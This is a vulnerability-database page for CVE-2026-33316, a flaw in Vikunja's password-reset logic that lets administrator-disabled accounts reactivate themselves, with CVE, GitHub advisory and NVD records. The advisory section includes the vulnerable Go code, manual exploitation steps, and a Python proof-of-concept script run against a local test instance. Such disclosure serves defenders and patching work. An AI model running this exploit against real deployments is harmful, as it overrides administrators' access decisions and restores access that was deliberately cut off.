Vulnerability-Lookup

CVE-2026-33316 (GCVE-0-2026-33316)

Vulnerability from cvelistv5 – Published: 2026-03-24 14:59 – Updated: 2026-03-26 13:08

Title

Vikunja’s Improper Access Control Enables Bypass of Administrator-Imposed Account Disablement

Summary

Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.0, a flaw in Vikunja’s password reset logic allows disabled users to regain access to their accounts. The `ResetPassword()` function sets the user’s status to `StatusActive` after a successful password reset without verifying whether the account was previously disabled. By requesting a reset token through `/api/v1/user/password/token` and completing the reset via `/api/v1/user/password/reset`, a disabled user can reactivate their account and bypass administrator-imposed account disablement. Version 2.2.0 patches the issue.

Severity ?

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CWE

CWE-284 - Improper Access Control
CWE-862 - Missing Authorization
CWE-863 - Incorrect Authorization

Assigner

GitHub_M

References

URL

Tags

	https://github.com/go-vikunja/vikunja/security/ad…	x_refsource_CONFIRM
	https://github.com/go-vikunja/vikunja/commit/049f…	x_refsource_MISC
	https://github.com/go-vikunja/vikunja/commit/d857…	x_refsource_MISC
	https://vikunja.io/changelog/vikunja-v2.2.0-was-r…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	go-vikunja	vikunja	Affected: < 2.2.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-33316",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-03-26T13:07:30.307577Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-03-26T13:08:08.138Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "vikunja",
          "vendor": "go-vikunja",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.2.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.0, a flaw in Vikunja\u2019s password reset logic allows disabled users to regain access to their accounts. The `ResetPassword()` function sets the user\u2019s status to `StatusActive` after a successful password reset without verifying whether the account was previously disabled. By requesting a reset token through `/api/v1/user/password/token` and completing the reset via `/api/v1/user/password/reset`, a disabled user can reactivate their account and bypass administrator-imposed account disablement. Version 2.2.0 patches the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-284",
              "description": "CWE-284: Improper Access Control",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "CWE-862: Missing Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-863",
              "description": "CWE-863: Incorrect Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-24T15:02:56.860Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-vq4q-79hh-q767",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-vq4q-79hh-q767"
        },
        {
          "name": "https://github.com/go-vikunja/vikunja/commit/049f4a6be46f9460bd516f489ef9f569574bc70d",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/go-vikunja/vikunja/commit/049f4a6be46f9460bd516f489ef9f569574bc70d"
        },
        {
          "name": "https://github.com/go-vikunja/vikunja/commit/d8570c603da1f26635ce6048d6af85ede827abfb",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/go-vikunja/vikunja/commit/d8570c603da1f26635ce6048d6af85ede827abfb"
        },
        {
          "name": "https://vikunja.io/changelog/vikunja-v2.2.0-was-released",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://vikunja.io/changelog/vikunja-v2.2.0-was-released"
        }
      ],
      "source": {
        "advisory": "GHSA-vq4q-79hh-q767",
        "discovery": "UNKNOWN"
      },
      "title": "Vikunja\u2019s Improper Access Control Enables Bypass of Administrator-Imposed Account Disablement"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-33316",
    "datePublished": "2026-03-24T14:59:17.242Z",
    "dateReserved": "2026-03-18T21:23:36.676Z",
    "dateUpdated": "2026-03-26T13:08:08.138Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-33316",
      "date": "2026-04-17",
      "epss": "0.00033",
      "percentile": "0.0939"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-33316\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-24T15:16:35.370\",\"lastModified\":\"2026-03-24T19:22:10.730\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.0, a flaw in Vikunja\u2019s password reset logic allows disabled users to regain access to their accounts. The `ResetPassword()` function sets the user\u2019s status to `StatusActive` after a successful password reset without verifying whether the account was previously disabled. By requesting a reset token through `/api/v1/user/password/token` and completing the reset via `/api/v1/user/password/reset`, a disabled user can reactivate their account and bypass administrator-imposed account disablement. Version 2.2.0 patches the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-284\"},{\"lang\":\"en\",\"value\":\"CWE-862\"},{\"lang\":\"en\",\"value\":\"CWE-863\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.2.0\",\"matchCriteriaId\":\"F28D4CDA-D35C-4636-AABA-A22EBE6F64D0\"}]}]}],\"references\":[{\"url\":\"https://github.com/go-vikunja/vikunja/commit/049f4a6be46f9460bd516f489ef9f569574bc70d\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/go-vikunja/vikunja/commit/d8570c603da1f26635ce6048d6af85ede827abfb\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/go-vikunja/vikunja/security/advisories/GHSA-vq4q-79hh-q767\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://vikunja.io/changelog/vikunja-v2.2.0-was-released\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-33316\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-03-26T13:07:30.307577Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-03-26T13:08:04.255Z\"}}], \"cna\": {\"title\": \"Vikunja\\u2019s Improper Access Control Enables Bypass of Administrator-Imposed Account Disablement\", \"source\": {\"advisory\": \"GHSA-vq4q-79hh-q767\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"go-vikunja\", \"product\": \"vikunja\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.2.0\"}]}], \"references\": [{\"url\": \"https://github.com/go-vikunja/vikunja/security/advisories/GHSA-vq4q-79hh-q767\", \"name\": \"https://github.com/go-vikunja/vikunja/security/advisories/GHSA-vq4q-79hh-q767\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/go-vikunja/vikunja/commit/049f4a6be46f9460bd516f489ef9f569574bc70d\", \"name\": \"https://github.com/go-vikunja/vikunja/commit/049f4a6be46f9460bd516f489ef9f569574bc70d\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/go-vikunja/vikunja/commit/d8570c603da1f26635ce6048d6af85ede827abfb\", \"name\": \"https://github.com/go-vikunja/vikunja/commit/d8570c603da1f26635ce6048d6af85ede827abfb\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://vikunja.io/changelog/vikunja-v2.2.0-was-released\", \"name\": \"https://vikunja.io/changelog/vikunja-v2.2.0-was-released\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.0, a flaw in Vikunja\\u2019s password reset logic allows disabled users to regain access to their accounts. The `ResetPassword()` function sets the user\\u2019s status to `StatusActive` after a successful password reset without verifying whether the account was previously disabled. By requesting a reset token through `/api/v1/user/password/token` and completing the reset via `/api/v1/user/password/reset`, a disabled user can reactivate their account and bypass administrator-imposed account disablement. Version 2.2.0 patches the issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-284\", \"description\": \"CWE-284: Improper Access Control\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-862\", \"description\": \"CWE-862: Missing Authorization\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-863\", \"description\": \"CWE-863: Incorrect Authorization\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-03-24T15:02:56.860Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-33316\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-03-26T13:08:08.138Z\", \"dateReserved\": \"2026-03-18T21:23:36.676Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-03-24T14:59:17.242Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-VQ4Q-79HH-Q767

Vulnerability from github – Published: 2026-03-20 17:25 – Updated: 2026-03-25 20:53

Summary

Vikunja’s Improper Access Control Enables Bypass of Administrator-Imposed Account Disablement

Details

Summary

A flaw in Vikunja’s password reset logic allows disabled users to regain access to their accounts. The ResetPassword() function sets the user’s status to StatusActive after a successful password reset without verifying whether the account was previously disabled. By requesting a reset token through /api/v1/user/password/token and completing the reset via /api/v1/user/password/reset, a disabled user can reactivate their account and bypass administrator-imposed account disablement.

Vulnerable Code Snippet

In pkg/user/user_password_reset.go, beginning at line 66:

    // Hash the password
    user.Password, err = HashPassword(reset.NewPassword)
    if err != nil {
        return
    }

    err = removeTokens(s, user, TokenPasswordReset)
    if err != nil {
        return
    }

    user.Status = StatusActive // <--- VULNERABILITY: Unconditionally sets status to Active
    _, err = s.
        Cols("password", "status").
        Where("id = ?", user.ID).
        Update(user)
    if err != nil {
        return
    }

The code is vulnerable because it assumes that any user resetting their password is transitioning from a normal state or an "Email Confirmation Required" state into an "Active" state. It completely ignores whether the user was placed in the StatusDisabled state by an administrator. Additionally, in the token request function (RequestUserPasswordResetTokenByEmail), the system fetches the user via GetUserWithEmail() which does not filter out disabled users, allowing them to legally request the token in the first place.

PoC (Proof of Concept)

Manual Exploitation Steps

Create a standard user account in Vikunja.
As an Administrator (or by modifying the database directly), disable the user account by setting their status to Disabled (status = 2).
Attempt to log in as the disabled user to verify access is blocked (receives HTTP 412: This account is disabled).
Without authenticating, send a POST request to /api/v1/user/password/token with the disabled user's email address.
Retrieve the password reset token from the incoming email.
Send a POST request to /api/v1/user/password/reset with the token and a new password.
Log in using the new password. Observe that the login succeeds (HTTP 200) and the account has been maliciously reactivated.

Automation PoC

import requests
import psycopg2
import time
import secrets

API_URL = "http://localhost:3456/api/v1"

def main():
    username = f"testuser_{secrets.token_hex(4)}"
    email = f"{username}@example.com"
    password = "SuperSecretPassword123!"

    print("[1] Registering user...")
    requests.post(f"{API_URL}/register", json={"username": username, "email": email, "password": password})

    print("[2] Admin disables account (Status = 2)...")
    conn = psycopg2.connect(host="localhost", database="vikunja", user="vikunja", password="vikunja_password")
    cursor = conn.cursor()
    cursor.execute("UPDATE users SET status = 2 WHERE username = %s;", (username,))
    conn.commit()

    print("[3] Verifying login is blocked...")
    res = requests.post(f"{API_URL}/login", json={"username": username, "password": password})
    print(f"Login response: {res.status_code} (Should be 412)")

    print("[4] Attacker requests password reset...")
    requests.post(f"{API_URL}/user/password/token", json={"email": email})

    print("[5] Attacker grabs token from email/DB...")
    cursor.execute("SELECT id FROM users WHERE username = %s;", (username,))
    user_id = cursor.fetchone()[0]
    cursor.execute("SELECT token FROM user_tokens WHERE user_id = %s AND kind = 1 ORDER BY created DESC LIMIT 1;", (user_id,))
    token = cursor.fetchone()[0]

    print("[6] Attacker submits reset, triggering bug...")
    new_password = "HackedPassword123!"
    requests.post(f"{API_URL}/user/password/reset", json={"token": token, "new_password": new_password})

    print("[7] Attacker logs in successfully!")
    res = requests.post(f"{API_URL}/login", json={"username": username, "password": new_password})
    print(f"Final Login response: {res.status_code} (Should be 200)")

    cursor.execute("SELECT status FROM users WHERE username = %s;", (username,))
    print(f"Final DB Status: {cursor.fetchone()[0]} (0 = Active)")
    conn.close()

if __name__ == "__main__":
    main()

Impact

Authentication & Authorization Bypass: An attacker can unilaterally reverse an administrative security decision.
Integrity & Confidentiality Impact: The attacker can regain full access to resources and functionality that were previously restricted due to the account being disabled.

Severity ?

8.1 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "code.vikunja.io/api"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33316"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-284",
      "CWE-862",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-20T17:25:47Z",
    "nvd_published_at": "2026-03-24T15:16:35Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nA flaw in Vikunja\u2019s password reset logic allows disabled users to regain access to their accounts. The `ResetPassword()` function sets the user\u2019s status to `StatusActive` after a successful password reset without verifying whether the account was previously disabled. By requesting a reset token through `/api/v1/user/password/token` and completing the reset via `/api/v1/user/password/reset`, a disabled user can reactivate their account and bypass administrator-imposed account disablement.\n\n#### Vulnerable Code Snippet\n\nIn `pkg/user/user_password_reset.go`, beginning at line 66:\n\n```go\n\t// Hash the password\n\tuser.Password, err = HashPassword(reset.NewPassword)\n\tif err != nil {\n\t\treturn\n\t}\n\n\terr = removeTokens(s, user, TokenPasswordReset)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tuser.Status = StatusActive // \u003c--- VULNERABILITY: Unconditionally sets status to Active\n\t_, err = s.\n\t\tCols(\"password\", \"status\").\n\t\tWhere(\"id = ?\", user.ID).\n\t\tUpdate(user)\n\tif err != nil {\n\t\treturn\n\t}\n```\n\nThe code is vulnerable because it assumes that any user resetting their password is transitioning from a normal state or an \"Email Confirmation Required\" state into an \"Active\" state. It completely ignores whether the user was placed in the `StatusDisabled` state by an administrator.\nAdditionally, in the token request function (`RequestUserPasswordResetTokenByEmail`), the system fetches the user via `GetUserWithEmail()` which does **not** filter out disabled users, allowing them to legally request the token in the first place.\n\n### PoC (Proof of Concept)\n\n#### Manual Exploitation Steps\n\n1. Create a standard user account in Vikunja.\n2. As an Administrator (or by modifying the database directly), disable the user account by setting their status to Disabled (`status = 2`).\n3. Attempt to log in as the disabled user to verify access is blocked (receives `HTTP 412: This account is disabled`).\n4. Without authenticating, send a `POST` request to `/api/v1/user/password/token` with the disabled user\u0027s email address.\n5. Retrieve the password reset token from the incoming email.\n6. Send a `POST` request to `/api/v1/user/password/reset` with the token and a new password.\n7. Log in using the new password. Observe that the login succeeds (`HTTP 200`) and the account has been maliciously reactivated.\n\n#### Automation PoC\n\n```python\nimport requests\nimport psycopg2\nimport time\nimport secrets\n\nAPI_URL = \"http://localhost:3456/api/v1\"\n\ndef main():\n    username = f\"testuser_{secrets.token_hex(4)}\"\n    email = f\"{username}@example.com\"\n    password = \"SuperSecretPassword123!\"\n    \n    print(\"[1] Registering user...\")\n    requests.post(f\"{API_URL}/register\", json={\"username\": username, \"email\": email, \"password\": password})\n    \n    print(\"[2] Admin disables account (Status = 2)...\")\n    conn = psycopg2.connect(host=\"localhost\", database=\"vikunja\", user=\"vikunja\", password=\"vikunja_password\")\n    cursor = conn.cursor()\n    cursor.execute(\"UPDATE users SET status = 2 WHERE username = %s;\", (username,))\n    conn.commit()\n    \n    print(\"[3] Verifying login is blocked...\")\n    res = requests.post(f\"{API_URL}/login\", json={\"username\": username, \"password\": password})\n    print(f\"Login response: {res.status_code} (Should be 412)\")\n    \n    print(\"[4] Attacker requests password reset...\")\n    requests.post(f\"{API_URL}/user/password/token\", json={\"email\": email})\n    \n    print(\"[5] Attacker grabs token from email/DB...\")\n    cursor.execute(\"SELECT id FROM users WHERE username = %s;\", (username,))\n    user_id = cursor.fetchone()[0]\n    cursor.execute(\"SELECT token FROM user_tokens WHERE user_id = %s AND kind = 1 ORDER BY created DESC LIMIT 1;\", (user_id,))\n    token = cursor.fetchone()[0]\n    \n    print(\"[6] Attacker submits reset, triggering bug...\")\n    new_password = \"HackedPassword123!\"\n    requests.post(f\"{API_URL}/user/password/reset\", json={\"token\": token, \"new_password\": new_password})\n    \n    print(\"[7] Attacker logs in successfully!\")\n    res = requests.post(f\"{API_URL}/login\", json={\"username\": username, \"password\": new_password})\n    print(f\"Final Login response: {res.status_code} (Should be 200)\")\n\n    cursor.execute(\"SELECT status FROM users WHERE username = %s;\", (username,))\n    print(f\"Final DB Status: {cursor.fetchone()[0]} (0 = Active)\")\n    conn.close()\n\nif __name__ == \"__main__\":\n    main()\n```\n\n### Impact\n\n* **Authentication \u0026 Authorization Bypass:** An attacker can unilaterally reverse an administrative security decision.\n* **Integrity \u0026 Confidentiality Impact:**  The attacker can regain full access to resources and functionality that were previously restricted due to the account being disabled.",
  "id": "GHSA-vq4q-79hh-q767",
  "modified": "2026-03-25T20:53:32Z",
  "published": "2026-03-20T17:25:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-vq4q-79hh-q767"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33316"
    },
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/commit/049f4a6be46f9460bd516f489ef9f569574bc70d"
    },
    {
      "type": "WEB",
      "url": "https://github.com/go-vikunja/vikunja/commit/d8570c603da1f26635ce6048d6af85ede827abfb"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/go-vikunja/vikunja"
    },
    {
      "type": "WEB",
      "url": "https://vikunja.io/changelog/vikunja-v2.2.0-was-released"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Vikunja\u2019s Improper Access Control Enables Bypass of Administrator-Imposed Account Disablement "
}

FKIE_CVE-2026-33316

Vulnerability from fkie_nvd - Published: 2026-03-24 15:16 - Updated: 2026-03-24 19:22

Severity ?

8.1 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Summary

References

URL	Tags
security-advisories@github.com	https://github.com/go-vikunja/vikunja/commit/049f4a6be46f9460bd516f489ef9f569574bc70d	Patch
security-advisories@github.com	https://github.com/go-vikunja/vikunja/commit/d8570c603da1f26635ce6048d6af85ede827abfb	Patch
security-advisories@github.com	https://github.com/go-vikunja/vikunja/security/advisories/GHSA-vq4q-79hh-q767	Exploit, Vendor Advisory
security-advisories@github.com	https://vikunja.io/changelog/vikunja-v2.2.0-was-released	Release Notes

Impacted products

	Vendor	Product	Version
	vikunja	vikunja	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F28D4CDA-D35C-4636-AABA-A22EBE6F64D0",
              "versionEndExcluding": "2.2.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.0, a flaw in Vikunja\u2019s password reset logic allows disabled users to regain access to their accounts. The `ResetPassword()` function sets the user\u2019s status to `StatusActive` after a successful password reset without verifying whether the account was previously disabled. By requesting a reset token through `/api/v1/user/password/token` and completing the reset via `/api/v1/user/password/reset`, a disabled user can reactivate their account and bypass administrator-imposed account disablement. Version 2.2.0 patches the issue."
    },
    {
      "lang": "es",
      "value": "Vikunja es una plataforma de gesti\u00f3n de tareas de c\u00f3digo abierto autoalojada. Antes de la versi\u00f3n 2.2.0, una falla en la l\u00f3gica de restablecimiento de contrase\u00f1a de Vikunja permite a los usuarios deshabilitados recuperar el acceso a sus cuentas. La funci\u00f3n \u0027ResetPassword()\u0027 establece el estado del usuario en \u0027StatusActive\u0027 despu\u00e9s de un restablecimiento de contrase\u00f1a exitoso sin verificar si la cuenta hab\u00eda sido deshabilitada previamente. Al solicitar un token de restablecimiento a trav\u00e9s de \u0027/api/v1/user/password/token\u0027 y completar el restablecimiento a trav\u00e9s de \u0027/api/v1/user/password/reset\u0027, un usuario deshabilitado puede reactivar su cuenta y eludir la deshabilitaci\u00f3n de cuenta impuesta por el administrador. La versi\u00f3n 2.2.0 corrige el problema."
    }
  ],
  "id": "CVE-2026-33316",
  "lastModified": "2026-03-24T19:22:10.730",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-24T15:16:35.370",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/go-vikunja/vikunja/commit/049f4a6be46f9460bd516f489ef9f569574bc70d"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Patch"
      ],
      "url": "https://github.com/go-vikunja/vikunja/commit/d8570c603da1f26635ce6048d6af85ede827abfb"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-vq4q-79hh-q767"
    },
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Release Notes"
      ],
      "url": "https://vikunja.io/changelog/vikunja-v2.2.0-was-released"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-284"
        },
        {
          "lang": "en",
          "value": "CWE-862"
        },
        {
          "lang": "en",
          "value": "CWE-863"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33316 (GCVE-0-2026-33316)

GHSA-VQ4Q-79HH-Q767

Summary

Vulnerable Code Snippet

PoC (Proof of Concept)

Manual Exploitation Steps

Automation PoC

Impact

FKIE_CVE-2026-33316

Tags

Sightings

Nomenclature